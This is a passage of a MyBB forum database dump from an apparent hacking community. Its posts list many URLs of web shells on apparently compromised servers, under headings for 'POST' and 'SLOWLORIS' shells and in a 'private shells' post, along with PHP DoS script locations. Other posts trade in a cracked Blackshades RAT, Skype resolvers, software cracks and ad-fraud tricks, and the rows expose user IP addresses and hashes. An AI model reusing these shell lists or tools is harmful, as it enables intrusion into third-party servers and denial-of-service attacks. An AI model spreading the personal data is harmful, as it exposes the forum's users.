av/x32.php\r\nhttp://189.254.218.34/webdav/greenshell.php\r\nhttp://217.6.136.144/webdav/greenshell.php\r\nhttp://200.80.8.198/webdav/mouss.php\r\nhttp://200.80.8.198/webdav/greenshell.php\r\nhttp://93.17.7.150/webdav/greenshell.php\r\nhttp://140.127.52.24/webdav/greenshell.php\r\nhttp://187.45.112.32/webdav/x64.php\r\nhttp://93.17.7.148/webdav/greenshell.php\r\nhttp://112.201.103.203/webdav/panel.php\r\nhttp://114.142.147.125/webdav/shell.php\r\nhttp://87.103.134.31/webdav/x32.php\r\nhttp://82.127.64.56/webdav/shell.php\r\nhttp://93.17.7.149/webdav/shell.php\r\nhttp://125.21.85.66/webdav/greenshell.php\r\nhttp://203.197.246.13/webdav/panel.php\r\nhttp://82.127.64.56/webdav/greenshell.php\r\nhttp://93.17.7.151/webdav/shell.php\r\nhttp://93.17.7.149/webdav/greenshell.php\r\nhttp://58.26.6.92/webdav/form.php\r\nhttp://81.223.64.3/webdav/greenshell.php\r\nhttp://urmybest.110mb.com/phpdos.php\r\nhttp://111.67.195.8/webdav/panel.php\r\nhttp://yogeshmehra1987.110mb.com/index.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://nksoft.de/ulogs.php\r\nhttp://beans.tv/ulogs.php\r\nhttp://mirllc.com/ulogs.php\r\nhttp://www.inchoates.com/smf/index.php\r\nhttp://ma77o.info/shell/77shell/shell.php\r\nhttp://61.129.51.224/webdav/panel.php\r\nhttp://shells.red-pill.eu/\r\nhttp://armavir-shop.ru/inde.php\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://sxleton.awardspace.us/index.php\r\nhttp://www.hexagonholdings.com/Portals/0/11.php\r\nhttp://190.103.101.170/webdav/x64.php\r\nhttp://69.13.40.82/webdav/x32.php\r\nhttp://198.104.131.210/webdav/panel.php\r\nhttp://161.58.93.18/webdav/panel.php\r\nhttp://www.1100f.com/member/index.php\r\nhttp://190.145.105.118/webdav/toxic8.php\r\nhttp://190.145.105.118/webdav/toxic9.php\r\nhttp://190.145.105.118/webdav/toxic1.php\r\nhttp://190.145.105.118/webdav/toxic2.php\r\nhttp://190.145.105.118/webdav/toxic6.php\r\nhttp://190.145.105.118/webdav/toxic.php\r\nhttp://190.145.105.118/webdav/toxic10.php\r\nhttp://190.145.105.118/webdav/toxic4.php\r\nhttp://190.145.105.118/webdav/toxic5.php\r\nhttp://190.145.105.118/webdav/toxic7.php\r\nhttp://190.145.105.118/webdav/toxic3.php\r\nhttp://174.127.45.194/webdav/panel.php\r\nhttp://195.15.2.83/webdav/panel.php\r\nhttp://187.46.80.196/webdav/x64.php\r\nhttp://187.52.105.162/webdav/x64.php\r\nhttp://187.59.52.138/webdav/x64.php\r\nhttp://202.196.33.153/webdav/greenshell.php\r\nhttp://190.95.231.66/webdav/x64.php\r\nhttp://46.2.46.140/webdav/x64.php\r\nhttp://190.92.6.237/webdav/x64.php\r\nhttp://201.86.171.71/webdav/x64.php\r\nhttp://187.54.177.172/webdav/x64.php\r\nhttp://190.94.112.32/webdav/x64.php\r\nhttp://178.77.68.206/webdav/x32.php\r\nhttp://212.85.40.233/webdav/x32.php\r\nhttp://212.85.40.233/webdav/x64.php\r\nhttp://190.103.235.12/webdav/x64.php\r\nhttp://178.77.68.206/webdav/x64.php\r\nhttp://201.51.246.185/webdav/x64.php\r\nhttp://95.82.248.96/webdav/_x64.php\r\nhttp://201.77.115.131/webdav/x64.php\r\nhttp://46.0.85.27/webdav/x64.php\r\nhttp://65.89.135.254/webdav/panel.php\r\nhttp://147.96.144.90/webdav/greenshell.php\r\nhttp://122.183.217.136/webdav/greenshell.php\r\nhttp://97.104.27.168/webdav/ulogs.php\r\nhttp://207.191.208.144/webdav/greenshell.php\r\nhttp://91.114.11.122/webdav/shell.php\r\nhttp://66.255.37.124/webdav/shell.php\r\nhttp://213.33.48.202/webdav/shell.php\r\nhttp://93.108.190.239/webdav/form.php\r\nhttp://190.244.29.113/webdav/panel.php\r\nhttp://60.240.232.232/webdav/shell.php\r\nhttp://91.121.100.84/webdav/x32.php\r\nhttp://82.112.32.42/webdav/x32.php\r\nhttp://189.205.253.104/webdav/panel.php\r\nhttp://178.124.148.32/webdav/panel.php\r\nhttp://120.105.97.7/webdav/panel.php\r\nhttp://221.116.9.29/webdav/panel.php\r\nhttp://72.0.34.195/webdav/greenshell.php\r\nhttp://76.160.223.161/webdav/greenshell.php\r\nhttp://91.113.215.58/webdav/shell.php\r\nhttp://203.10.47.149/webdav/mouss.php\r\nhttp://85.25.16.170/webdav/x32.php\r\nhttp://65.52.34.176/webdav/form.php\r\nhttp://190.216.51.80/webdav/form.php\r\nhttp://203.97.107.214/webdav/x32.php\r\nhttp://140.133.6.59/webdav/form.php\r\nhttp://219.75.241.125/webdav/form.php\r\nhttp://190.101.125.117/webdav/x64.php\r\nhttp://95.9.105.33/webdav/ulogs.php\r\nhttp://85.183.88.7/webdav/greenshell.php\r\nhttp://124.155.211.235/webdav/x32.php\r\nhttp://190.24.133.205/webdav/form.php\r\nhttp://81.255.199.42/webdav/mouss.php\r\nhttp://220.245.100.87/webdav/shell.php\r\nhttp://91.121.166.14/webdav/x32.php\r\nhttp://132.248.52.174/webdav/panel.php\r\nhttp://148.160.170.108/webdav/panel.php\r\nhttp://190.66.25.27/webdav/panel.php\r\nhttp://200.140.145.29/webdav/panel.php\r\nhttp://140.115.80.111/webdav/panel.php\r\nhttp://82.212.128.142/webdav/panel.php\r\nhttp://122.49.77.59/webdav/panel.php\r\nhttp://217.41.23.194/webdav/panel.php\r\nhttp://110.138.183.143/webdav/panel.php\r\nhttp://88.26.206.142/webdav/panel.php\r\nhttp://150.146.34.11/webdav/panel.php\r\nhttp://194.141.64.138/webdav/panel.php\r\nhttp://201.228.144.124/webdav/panel.php\r\nhttp://122.165.52.189/webdav/panel.php\r\nhttp://69.143.28.40/webdav/panel.php\r\nhttp://140.127.32.86/webdav/panel.php\r\nhttp://71.184.200.8/webdav/panel.php\r\nhttp://130.179.30.237/webdav/panel.php\r\nhttp://112.207.146.238/webdav/panel.php\r\nhttp://202.129.207.194/webdav/panel.php\r\nhttp://66.71.191.93/webdav/panel.php\r\nhttp://150.254.77.190/webdav/greenshell.php\r\nhttp://140.126.130.205/webdav/panel.php\r\nhttp://120.127.14.41/webdav/greenshell.php\r\nhttp://monederocfe.com/webdav/x32.php\r\n\r\n=== POST SHELLS ==\r\n\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://163.178.170.74/webdav/greenshell.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://218.87.136.9/webdav/config.php\r\nhttp://shells.red-pill.eu/\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://www.indianethicalhacker.blackapplehost.com/xoep.php\r\nhttp://theresahackforthat.webs.com/shell.php\r\nhttp://163.178.170.74/webdav/greenshell.php\r\nhttp://gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/\r\nhttp://mmx1.webs.com/shell.php\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://www.1100f.com/member/\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b...\r\nhttp://www.anarchistcookbook.com/showthread.php/33795-PHP-DoS-Script\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7...\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://aldy.byethost2.com/\r\nhttp://avatarmovieonline.110mb.com/\r\nhttp://mehdi4604.persiangig.com/vbulltien/ddos.php\r\nhttp://dinamo.com.nu/php/\r\nhttp://niyuavalon.webege.com/phpddos/control/\r\nhttp://ngoisaoblog.vn/DDOS.php\r\nhttp://pulsar-tec.com/\r\nhttp://tinypaste.com/e38333\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/index.php\r\nhttp://surrealesport.su.funpic.de/index.php?forum-privmsg-new=0&empfid=1\r\nhttp://virusgamingz.roxorgamers.com/\r\nhttp://theresahackforthat.webs.com/shell.php\r\nhttp://shells.red-pill.eu/\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://202.190.74.200/webdav/x32.php\r\nhttp://203.153.230.78/webdav/config.php\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://217.128.142.249/webdav/greenshell.php\r\nhttp://163.178.170.74/webdav/greenshell.php\r\nhttp://204.191.9.89/webdav/shell16182.php\r\nhttp://indianethicalhacker.blackapplehost.com/xoep.php?act=phptools&host=/\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&.../\r\nhttp://82.114.168.38/webdav/greenshell.php?act=phptools&host=/\r\nhttp://mmx2.webs.com/shell.php\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools/\r\nhttp://www.gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://82.114.168.38/webdav/greenshell.php?act=php...\r\nhttp://mmx1.webs.com/shell.php\r\nhttp://www.windowsecurity.com/faqs/Trojans/\r\nhttp://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols\r\nhttp://shells.red-pill.eu\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols&hos...\r\nhttp://tools.rosinstrument.com/proxy/?rule1\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&...\r\nhttp://alone-pri.tk/web.php\r\n\r\n=== SLOWLORIS SHELLS ==\r\n\r\nhttp://d-dos.50webs.com/ddos.php\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH\r\nhttp://belakshell.50webs.com/index.php\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://feeds2.feedburner.com/alivingtruth/DRwH/\r\nhttp://www.dinamo.com.nu/php/\r\nhttp://firman-mannte.blogspot.com/\r\nhttp://www.1100f.com/member/\r\nhttp://www.tux-planet.fr/public/hack/ddos/php-dos.phps\r\nhttp://niyuavalon.webege.com/phpddos/control/\r\nhttp://tinypaste.com/e38333\r\nhttp://dinamo.com.nu/php/\r\nhttp://avatarmovieonline.110mb.com/\r\nhttp://pulsar-tec.com/\r\nhttp://toutsourtous.webobo.biz/html.php?id_menu=3336677\r\nhttp://virusgamingz.roxorgamers.com/\r\nhttp://www.fahriozturk.tr.gg/111.htm/\r\nhttp://pastie.org/pastes/1044528/download\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9bcef/\r\nhttp://www.fahriozturk.tr.gg/111.htm\r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://toutsourtous.anatoile.com/html.php?id_menu=3206841\r\nhttp://eq22.weebly.com/\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHPSESSID=8e7467e5523dbf043564467b1fb9bcef/\r\nhttp://zhan.liechesk.cn/hechihuagong.com.cn-domain\r\nhttp://www.fahriozturk.tr.gg/111.htm?PHP...7b1fb9b...\r\nhttp://pastie.org/pastes/1044528/download/\r\nhttp://www.sidarglobal.com/help.php\r\nhttp://gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://163.178.170.74/webdav/greenshell.php\r\nhttp://www.theresahackforthat.webs.com/shell.php\r\nhttp://www.ecofilms.gr/search_gr.asp\r\nhttp://82.114.168.38/webdav/greenshell.php\r\nhttp://theresahackforthat.webs.com/shell.php\r\nhttp://216.52.226.103/webdav/rlb.php\r\nhttp://mmx1.webs.com/shell.php\r\nhttp://mapi.co.kr/zb41pl7/bbs/data/mapi_bbs/settings.php\r\nhttp://www.gfdgdfgfdgfd.co.cc/shell.php\r\nhttp://www.windowsecurity.com/faqs/Trojans/\r\nhttp://203.153.230.78/webdav/config.php\r\nhttp://tools.rosinstrument.com/proxy/?rule1\r\nhttp://shells.red-pill.eu/\r\nhttp://82.114.168.38/webdav/greenshell.php?act=phptools&host=/\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&.../\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools/\r\nhttp://shells.red-pill.eu\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools\r\nhttp://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols\r\nhttp://sockslist.net/proxy/server-socks-hide-ip-address/91\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&.../\r\nhttp://sockslist.net/proxy/server-socks-hide-ip-address/2#proxylist\r\nhttp://www.webadminblog.com/index.php/tag/network/\r\nhttp://sockslist.net/proxy/server-socks-hide-ip-address/3\r\nhttp://www.ecofilms.gr/search_gr.asp?&.../\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols/\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&host=/\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols&hos...\r\nhttp://203.153.230.78/webdav/config.php?act=phptools&host=/\r\nhttp://www.ecofilms.gr/search_gr.asp?act...ols&host=/\r\nhttp://www.ecofilms.gr/search_gr.asp?&.../\r\nhttp://www.ecofilms.gr/search_gr.asp?act=phptools&...\r\nhttp://clintonacademy.org/2007Women/yummy.php\r\nhttp://81.149.25.109/webdav/sprint.php\r\nhttp://www.octcca.org/wp-content/uploads/2010/12/yummy.php\r\nhttp://www.riversidesbc.com/calendar/images/yummy.php\r\n\r\n[/code]\r\n[/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f4a5755979022089d59a3163a2cbc442', '0', '0'); INSERT INTO mybb_posts VALUES('7324', '1240', '0', '81', 'Some private shells', '0', '1', 't3h jok3r', '1352524892', 'http://187.33.159.118/webdav/shellajejas.php \r\nhttp://200.128.81.23/webdav/shellajejas.php \r\nhttp://74.91.116.127/webdav/shellajejas.php \r\nhttp://187.48.62.39/webdav/shellajejas.php \r\nhttp://118.97.164.18/webdav/shellajejas.php \r\nhttp://222.127.10.240/webdav/shellajejas.php \r\nhttp://119.82.231.91/webdav/shellajejas.php \r\nhttp://193.140.142.110/webdav/shellajejas.php \r\nhttp://188.173.78.190/webdav/shellajejas.php \r\nhttp://120.72.85.84/webdav/shellajejas.php\r\n\r\nEnjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7874c38fc1cd2dd959e4ac6880829ee0', '0', '0'); INSERT INTO mybb_posts VALUES('7325', '1241', '0', '35', 'New Userbars- Voting', '0', '1', 't3h jok3r', '1352525168', 'I picked a couple of new userbars I was wondering if we should change the userbars or not.\n\nIf the majority says change then here are the options.\n\n[b]Set # 1[/b]\n\n[url=http://help.forumotion.com/t103332-glow-forum-ranks][img]http://www.thomasbenacci.co.uk/files/Glow_Forum_Ranks_Sample.png[/img][/url]\n\n[b]Set # 2[/b]\n\n[url=http://help.forumotion.com/t97368-rank-s-black-neon-with-psd][img]http://fc01.deviantart.net/fs70/i/2011/268/c/a/rank_psd_black_neon_by_mazeko-d37obbc.png[/img][/url]\n\n[b]Set # 3[/b]\n\n[url=http://help.forumotion.com/t116368-green-and-grey-forum-ranks][img]http://i32.servimg.com/u/f32/16/52/57/78/previe18.png[/img][/url]\n\n[b]Set # 4[/b]\nThe Current ones\n\nNOTE: I will download the PSD file and edit it, these are just an example.', '72.231.24.165', '1223104677', '1', '0', '1', '1352580669', '1', '337a40b8da0428c06d8f46297dbda84b', '0', '1352580669'); INSERT INTO mybb_posts VALUES('7326', '1213', '7214', '34', 'RE: Black Sleek Thread Design .PSD', '0', '9', 'p420', '1352525677', '[quote=\'VirtualLegend\' pid=\'7214\' dateline=\'1352315542\']\r\nLooks Nice, Did you made it?\r\n[/quote]\r\n\r\nYeah i made this for someone but then they leaked it on to other sites then carried on.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2f2380c6b60cd0df8c6d9a3d83aa8eeb', '0', '0'); INSERT INTO mybb_posts VALUES('7327', '1242', '0', '34', 'Another thread design PSD', '0', '9', 'p420', '1352525738', 'Preview \r\n[img]http://i.minus.com/iviyf4yv1AZMB.png[/img]\r\n\r\n[b][color=#FF0000]Post to see download link.[/color][/b]\r\n\r\n\r\n\r\n[lock] Link \r\nhttp://adf.ly/EJH0k \r\n\r\n[/lock]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0f532e9b3af96a03aa85abd4bc8d72f4', '0', '0'); INSERT INTO mybb_posts VALUES('7328', '1040', '5986', '61', 'RE: How To Get Passes To Porn Sites', '0', '9', 'p420', '1352525925', 'Thanks I tried it today and it worked :D', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '88147b0841278b27e9ba5696d2cfc37d', '0', '0'); INSERT INTO mybb_posts VALUES('7329', '812', '4261', '61', 'RE: Skype resolvers [WEB BASED]', '0', '9', 'p420', '1352526024', 'Thanks a bunch. Does the API still work and asylum booters skype resolver is great.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '396175ed671ab5534b3ebabd35facc24', '0', '0'); INSERT INTO mybb_posts VALUES('7330', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '258', 'PiXEL^OG', '1352526620', 'I could use some extra cash , Thanks ;D', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '760dc6d852c4a6dab8c9ac159f48ebf0', '0', '0'); INSERT INTO mybb_posts VALUES('7331', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '258', 'PiXEL^OG', '1352526732', 'This looks very nice , Another HQ thread by you Reloadzor! :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '1fc1adb55bd11e49a99984e60c807386', '0', '0'); INSERT INTO mybb_posts VALUES('7332', '1211', '7170', '18', 'RE: Facebook Blaster Pro v10.0', '0', '9', 'p420', '1352526819', 'Oh this shit tight thanks.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a089197e983e8ebd52fd8b493a156178', '0', '0'); INSERT INTO mybb_posts VALUES('7334', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '4', 'Triple H', '1352527172', 'i just watch online movies', '49.248.27.150', '838343574', '1', '0', '0', '0', '1', '9a8646381bb6967ca3eee8864ec8c5fc', '0', '0'); INSERT INTO mybb_posts VALUES('7335', '1225', '7249', '25', 'RE: [Serials] Malwarebytes Full keys Dump', '0', '8', 'spacefish36', '1352527686', 'Thanks this still works. I was looking for these few weeks ago and finally found some when I gave up lol.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a491139b60009ac62233e79831246e6b', '0', '0'); INSERT INTO mybb_posts VALUES('7336', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352527957', 'Triple H reached 123 posts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '491d504307af1e221c4e1d899f967aaf', '0', '0'); INSERT INTO mybb_posts VALUES('7337', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '1', 't3h jok3r', '1352527982', 'I watch movies, play PS3 or exchange posts with other sites.', '72.231.24.165', '1223104677', '1', '0', '1', '1352528069', '1', '634ae05d8da6c79a9278af3057f1a1ed', '0', '1352528069'); INSERT INTO mybb_posts VALUES('7338', '1244', '0', '83', '[How to] Send a DMCA takedown notice', '0', '5', 'Timmy', '1352528646', 'I have realized that content nowadays have been leeched a lot therefore many people issue DMCA notices but some people don\'t know how. It\'s easy and I even got a template for you.\r\n\r\n[b]Template[/b]\r\n\r\n[quote]\r\n\r\nMy name is [color=#FF0000]INSERT NAME[/color] and I am the [color=#FF0000]INSERT TITLE of INSERT COMPANY NAME[/color]. A website that your company hosts (according to WHOIS information) is infringing on at least one copyright owned by my company.\r\n\r\nAn article was copied onto your servers without permission. The original [color=#FF0000]ARTICLE/PHOTO[/color], to which we own the exclusive copyrights, can be found at:\r\n\r\n[color=#FF0000]PROVIDE WEBSITE URL[/color]\r\n\r\nThe unauthorized and infringing copy can be found at:\r\n\r\n[color=#FF0000]PROVIDE WEBSITE URL[/color]\r\n\r\nThis letter is official notification under Section 512(c) of the Digital Millennium Copyright Act (”DMCA”), and I seek the removal of the aforementioned infringing material from your servers. I request that you immediately notify the infringer of this notice and inform them of their duty to remove the infringing material immediately, and notify them to cease any further posting of infringing material to your server in the future.\r\n\r\nPlease also be advised that law requires you, as a service provider, to remove or disable access to the infringing materials upon receiving this notice. Under US law a service provider, such as yourself, enjoys immunity from a copyright lawsuit provided that you act with deliberate speed to investigate and rectify ongoing copyright infringement. If service providers do not investigate and remove or disable the infringing material this immunity is lost. Therefore, in order for you to remain immune from a copyright infringement action you will need to investigate and ultimately remove or otherwise disable the infringing material from your servers with all due speed should the direct infringer, your client, not comply immediately.\r\n\r\nI am providing this notice in good faith and with the reasonable belief that rights my company owns are being infringed. Under penalty of perjury I certify that the information contained in the notification is both true and accurate, and I have the authority to act on behalf of the owner of the copyright(s) involved.\r\n\r\nShould you wish to discuss this with me please contact me directly.\r\n\r\nThank you.\r\n\r\n[color=#FF0000]/s/YOUR NAME\r\n\r\nAddress\r\nCity, State Zip\r\nPhone\r\nE-mail[/color]\r\n\r\n[/quote]\r\n\r\nIf the site is using Cloudflare then send a DMCA to Cloudflare first to find out what hosting the site is using. Here\'s the link for Cloudflare.\r\n\r\nhttps://www.cloudflare.com/abuse/dmca\r\n\r\nBe sure to use the template above.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '404f05f52792ed1484896b84b39e4af1', '0', '0'); INSERT INTO mybb_posts VALUES('7339', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '1', 't3h jok3r', '1352529485', 'Downloaded it.\n\nIs this the same pack I gave you once Ipod? Anyway I verified that mediafire download ID g8qa22aqmftitlq is safe.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd3c7931844d55b4ae171b3c681194759', '0', '0'); INSERT INTO mybb_posts VALUES('7340', '1245', '0', '28', 'New Section Added in VIP tab', '0', '1', 't3h jok3r', '1352529862', 'I added \"other premium giveaways\" section in which you are allowed to post anything except dumps, programs and methods/tutorials. You are allowed to but not limited to distribute theme rips, exploits, VPNs, shells, plugins/addons, graphic designs, etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '189b879dd750641cd8333e712f579e42', '0', '0'); INSERT INTO mybb_posts VALUES('7341', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1352530272', 'Ipod can you tell me where to put the app and data folder on windows?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0828878513a6799131c67ce7829454dd', '0', '0'); INSERT INTO mybb_posts VALUES('7342', '1167', '6826', '75', 'RE: Batman Arkham City Cheats', '0', '5', 'Timmy', '1352530472', 'No problem. Did you complete batman or are you still playing it?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2089684c781bc6450cf8027e21fdf175', '0', '0'); INSERT INTO mybb_posts VALUES('7343', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '5', 'Timmy', '1352530926', 'Thanks for Blackshades RAT.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9baa9cf9f61de42dd76d7a4e98bbe2c6', '0', '0'); INSERT INTO mybb_posts VALUES('7345', '1246', '0', '65', 'L33T Hacking Video', '0', '1', 't3h jok3r', '1352535067', 'Timmy made us a quick video to help us promote L33T Hacking! (It\'s special because I told him to make it and it\'s the first l33thacking.NET video.\n\n[video=youtube]https://www.youtube.com/watch?v=jnL4PDXdk7I[/video]\n\nReviews?\n\nNote: It\'s better to watch in full screen.', '72.231.24.165', '1223104677', '1', '0', '1', '1352535361', '1', 'f73250ee9a92d62a721c94b7422d1e1f', '0', '1352535361'); INSERT INTO mybb_posts VALUES('7346', '253', '1106', '56', 'RE: Count to 200', '0', '7', 'Romdu62', '1352535773', '61. Cuz I have a R in my username.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5e37ded2c7a3bb97110c80db2a56a963', '0', '0'); INSERT INTO mybb_posts VALUES('7347', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '7', 'Romdu62', '1352535815', '[img]http://img820.imageshack.us/img820/3958/lw5fi.gif[/img]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '219172cb28e90e57085de57767e37fec', '0', '0'); INSERT INTO mybb_posts VALUES('7348', '238', '1021', '56', 'RE: Ban the user above you', '0', '7', 'Romdu62', '1352535859', 'Banned for being the top poster.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f1cffc69e9f259fc8e87fb9003d194a3', '0', '0'); INSERT INTO mybb_posts VALUES('7349', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '7', 'Romdu62', '1352535902', '0/10 smart enough to have his email in his sig.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3aee22a8ff96c49c7dc63917fc022a41', '0', '0'); INSERT INTO mybb_posts VALUES('7350', '197', '696', '56', 'RE: /me Thread', '0', '7', 'Romdu62', '1352535948', '/me is happy that Obama won.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd5e3caf5f0f558cf351a2101cbeb688f', '0', '0'); INSERT INTO mybb_posts VALUES('7351', '487', '2354', '56', 'RE: Corrupt a wish', '0', '7', 'Romdu62', '1352536001', 'Granted but then you will get repfucked because you are a rep whore\n\nI wish I could make a time machine.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4b9841e3a958c09d1c3acaf25e001d39', '0', '0'); INSERT INTO mybb_posts VALUES('7352', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '7', 'Romdu62', '1352536047', 'Idevice customzing, jailbreaking etc section.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'de8227efa14f4ce690786072426cdf99', '0', '0'); INSERT INTO mybb_posts VALUES('7353', '1232', '7304', '9', 'RE: Adfoc.us Trick', '0', '53', 'sirchamp', '1352536653', '[quote=\'iTzIpod\' pid=\'7304\' dateline=\'1352518006\']\r\nI doubt it does Triple H.\r\n\r\nSirchamp, why did you share the secret to your service?\r\n[/quote]\r\n\r\nIts \"public\". Everyone knows it on HF. This trick also works on linkc.at. But theres only a small chance that you will get paid out.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4390940c2d6f04dbbfa67b3f68f03baa', '0', '0'); INSERT INTO mybb_posts VALUES('7354', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '257', 'XxTREYZxX', '1352536919', 'Thanks for this hoping it will work.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '06ff0e30852b3b96eb70f12f4e6686d9', '0', '0'); INSERT INTO mybb_posts VALUES('7355', '1235', '7313', '42', 'RE: Marijuana legalized in two US states', '0', '53', 'sirchamp', '1352537238', 'For legalization of course. The prohibition is ridiculous. I hope it will be legalized here sometime. At the moment you only have to pay 100CHF(=90$) if you are found with 10gramms or less.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f5b73039df46f67a76aae41365896986', '0', '0'); INSERT INTO mybb_posts VALUES('7356', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1352537273', '0/10 dont even have one lol', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '4101095959290cd95c2467af2c2df35f', '0', '0'); INSERT INTO mybb_posts VALUES('7357', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352537725', 'Banned for having 91 post', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'e32b664efb931b22fcf87c50cb73ca17', '0', '0'); INSERT INTO mybb_posts VALUES('7358', '1230', '7279', '49', 'RE: great suggestion', '0', '257', 'XxTREYZxX', '1352537850', 'Thanks guys hope we Get this happening.\nTriple H it would be up to the staff and admin and maybe me', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '65cdb34a1b1e519def0b05ddcafc1e91', '0', '0'); INSERT INTO mybb_posts VALUES('7359', '1246', '7345', '65', 'RE: L33T Hacking Video', '0', '53', 'sirchamp', '1352539547', 'Actually not a bad video :D\nThanks timmy. We should get a few more views though...', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6db24d8baf2328a089e6b30b682f8998', '0', '0'); INSERT INTO mybb_posts VALUES('7398', '1247', '0', '4', 'Hey Everybody!', '0', '342', 'Squirt1971', '1352571921', 'Hey guys \r\n\r\nI\'m new to this forum and I\'m hoping it can help me learn more on the immense topic of hacking. Glad to be here :D', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', 'd810d9320c6927a7e779f82ee47de1e5', '0', '0'); INSERT INTO mybb_posts VALUES('7361', '1245', 